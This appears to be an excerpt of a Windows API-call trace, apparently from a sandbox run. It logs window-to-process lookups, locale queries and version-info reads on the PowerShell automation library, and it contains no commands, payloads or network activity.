	[0854.393] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x538
	[0854.393] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x568
	[0854.393] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x538
	[0854.393] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x540
	[0854.393] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x540
	[0854.393] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x57c
	[0854.393] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x460
	[0854.394] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x554
	[0854.394] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.394] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x528
	[0854.394] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.394] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.394] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.394] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x79c
	[0854.394] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.394] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4e0
	[0854.394] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.395] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x460
	[0854.395] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x460
	[0854.395] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x44c
	[0854.395] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x778
	[0854.395] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x460
	[0854.395] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x558
	[0854.395] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.395] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.395] GetWindowThreadProcessId (in: hWnd=0x10b64, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x2254
	[0854.395] GetWindowThreadProcessId (in: hWnd=0x10b60, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x2250
	[0854.396] GetWindowThreadProcessId (in: hWnd=0x10b54, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x16f0
	[0854.396] GetWindowThreadProcessId (in: hWnd=0x10b48, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1338
	[0854.396] GetWindowThreadProcessId (in: hWnd=0x10b3e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1ca0
	[0854.396] GetWindowThreadProcessId (in: hWnd=0x10b34, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x238c
	[0854.396] GetWindowThreadProcessId (in: hWnd=0x10b2a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b08
	[0854.396] GetWindowThreadProcessId (in: hWnd=0x10b0e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1a8c
	[0854.396] GetWindowThreadProcessId (in: hWnd=0x10af8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x18e0
	[0854.396] GetWindowThreadProcessId (in: hWnd=0x10aec, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x2344
	[0854.396] GetWindowThreadProcessId (in: hWnd=0x10ae0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1d8c
	[0854.396] GetWindowThreadProcessId (in: hWnd=0x10ad4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1038
	[0854.396] GetWindowThreadProcessId (in: hWnd=0x10ad0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1a58
	[0854.397] GetWindowThreadProcessId (in: hWnd=0x10acc, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1c7c
	[0854.397] GetWindowThreadProcessId (in: hWnd=0x10ac6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1f04
	[0854.397] GetWindowThreadProcessId (in: hWnd=0x10ac2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x18b8
	[0854.397] GetWindowThreadProcessId (in: hWnd=0x40278, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x22c8
	[0854.397] GetWindowThreadProcessId (in: hWnd=0x10abe, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x21b8
	[0854.397] GetWindowThreadProcessId (in: hWnd=0x20958, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x21c0
	[0854.397] GetWindowThreadProcessId (in: hWnd=0x10a7a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x219c
	[0854.397] GetWindowThreadProcessId (in: hWnd=0x10a6a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x20f4
	[0854.397] GetWindowThreadProcessId (in: hWnd=0x10a4c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x20e4
	[0854.397] GetWindowThreadProcessId (in: hWnd=0x10a40, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x20e8
	[0854.398] GetWindowThreadProcessId (in: hWnd=0x10a36, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x20ec
	[0854.398] GetWindowThreadProcessId (in: hWnd=0x20602, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x20f0
	[0854.398] GetWindowThreadProcessId (in: hWnd=0x10a2e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1e34
	[0854.398] GetWindowThreadProcessId (in: hWnd=0x10a28, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xc38
	[0854.398] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1fe4
	[0854.398] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1f10
	[0854.398] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1f0c
	[0854.398] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1f08
	[0854.398] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1ef0
	[0854.398] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1eec
	[0854.399] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1ee4
	[0854.399] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1ed8
	[0854.399] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1ed0
	[0854.399] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1e8c
	[0854.399] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1e88
	[0854.399] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1e84
	[0854.399] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1604
	[0854.399] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1c2c
	[0854.399] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1c08
	[0854.400] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1c0c
	[0854.400] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1c10
	[0854.400] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1c14
	[0854.400] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1c18
	[0854.400] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1c1c
	[0854.400] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x16fc
	[0854.400] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1e78
	[0854.400] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1c20
	[0854.400] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x191c
	[0854.401] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1748
	[0854.401] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1bb4
	[0854.401] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x10bc
	[0854.401] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b50
	[0854.401] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x14b4
	[0854.401] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x149c
	[0854.401] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x14a8
	[0854.401] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1490
	[0854.402] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x14a4
	[0854.402] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x148c
	[0854.402] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1458
	[0854.402] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b4c
	[0854.402] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b3c
	[0854.402] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x19bc
	[0854.402] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x199c
	[0854.402] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1998
	[0854.403] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1994
	[0854.403] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1990
	[0854.403] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1984
	[0854.403] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x197c
	[0854.403] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1978
	[0854.403] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1824
	[0854.403] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1088
	[0854.403] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1908
	[0854.403] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x18cc
	[0854.404] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x18d0
	[0854.404] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1840
	[0854.404] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x10c4
	[0854.404] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x128c
	[0854.404] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x16e8
	[0854.404] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x16cc
	[0854.404] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x274
	[0854.404] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x10e0
	[0854.405] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x10cc
	[0854.405] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x10c0
	[0854.405] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x10d0
	[0854.405] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1198
	[0854.405] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1080
	[0854.405] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1074
	[0854.405] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x106c
	[0854.405] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1474
	[0854.405] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1414
	[0854.406] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xbd0
	[0854.406] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x550
	[0854.406] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xa38
	[0854.406] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x16d0
	[0854.406] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x16d4
	[0854.406] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x15bc
	[0854.406] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x15a0
	[0854.406] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x159c
	[0854.407] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1598
	[0854.407] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1594
	[0854.407] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1590
	[0854.407] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x158c
	[0854.407] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1588
	[0854.407] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1584
	[0854.407] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1580
	[0854.407] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x157c
	[0854.407] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1488
	[0854.408] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1404
	[0854.408] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x11b8
	[0854.408] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xbd4
	[0854.408] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe0c
	[0854.408] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xd30
	[0854.408] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe70
	[0854.408] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x13b8
	[0854.408] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe20
	[0854.409] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe2c
	[0854.409] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe00
	[0854.409] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe04
	[0854.409] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xc94
	[0854.409] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x13b0
	[0854.409] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x13ac
	[0854.409] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x13a8
	[0854.409] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1374
	[0854.409] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x132c
	[0854.410] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1328
	[0854.410] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x12d0
	[0854.410] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x12cc
	[0854.410] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x12c8
	[0854.410] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1290
	[0854.410] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1218
	[0854.413] WerSetFlags () returned 0x0
	[0855.419] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0855.419] CoTaskMemFree (pv=0x0) 
	[0855.420] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14e1a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14e1a0 | out: pulNumLanguages=0x14e1a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14e1a0) returned 1
	[0855.420] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14e1a8, pwszLanguagesBuffer=0x2e66830, pcchLanguagesBuffer=0x14e1a0 | out: pulNumLanguages=0x14e1a8, pwszLanguagesBuffer=0x2e66830, pcchLanguagesBuffer=0x14e1a0) returned 1
	[0855.426] CoTaskMemAlloc (cb=0x24) returned 0x2b7060
	[0855.426] GetUserDefaultLocaleName (in: lpLocaleName=0x2b7060, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0855.427] CoTaskMemFree (pv=0x2b7060) 
	[0855.453] CoTaskMemAlloc (cb=0x104) returned 0x242b10
	[0855.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.453] CoTaskMemFree (pv=0x242b10) 
	[0855.455] CoTaskMemAlloc (cb=0x104) returned 0x242b10
	[0855.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.455] CoTaskMemFree (pv=0x242b10) 
	[0855.457] CoTaskMemAlloc (cb=0x104) returned 0x242b10
	[0855.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242b10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.457] CoTaskMemFree (pv=0x242b10) 
	[0856.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0856.955] SetErrorMode (uMode=0x1) returned 0x1
	[0856.955] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14de20 | out: lpFileInformation=0x14de20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0856.955] SetErrorMode (uMode=0x1) returned 0x1
	[0856.956] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14e090 | out: lpdwHandle=0x14e090) returned 0x94c
	[0856.957] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e6a0c0 | out: lpData=0x2e6a0c0) returned 1
	[0856.958] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14e008, puLen=0x14e000 | out: lplpBuffer=0x14e008*=0x2e6a15c, puLen=0x14e000) returned 1
	[0856.958] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x2e6a238, puLen=0x14df70) returned 1
	[0856.958] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0856.958] CoTaskMemAlloc (cb=0x2e) returned 0x2b5dc0
	[0856.958] lstrcpyW (in: lpString1=0x2b5dc0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0856.958] CoTaskMemFree (pv=0x2b5dc0) 
	[0856.958] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x2e6a28c, puLen=0x14df70) returned 1
	[0856.958] lstrlenW (lpString="System.Management.Automation") returned 28
	[0856.958] CoTaskMemAlloc (cb=0x3c) returned 0x229050
	[0856.958] lstrcpyW (in: lpString1=0x229050, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0856.958] CoTaskMemFree (pv=0x229050) 
	[0856.958] VerQueryValueW (in: pBlock=0x2e6a0c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14df78, puLen=0x14df70 | out: lplpBuffer=0x14df78*=0x2e6a2e8, puLen=0x14df70) returned 1
	[0856.958] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0856.958] CoTaskMemAlloc (cb=0x20) returned 0x2b70c0
	[0856.958] lstrcpyW (in: lpString1=0x2b70c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0856.958] CoTaskMemFree (pv=0x2b70c0) 
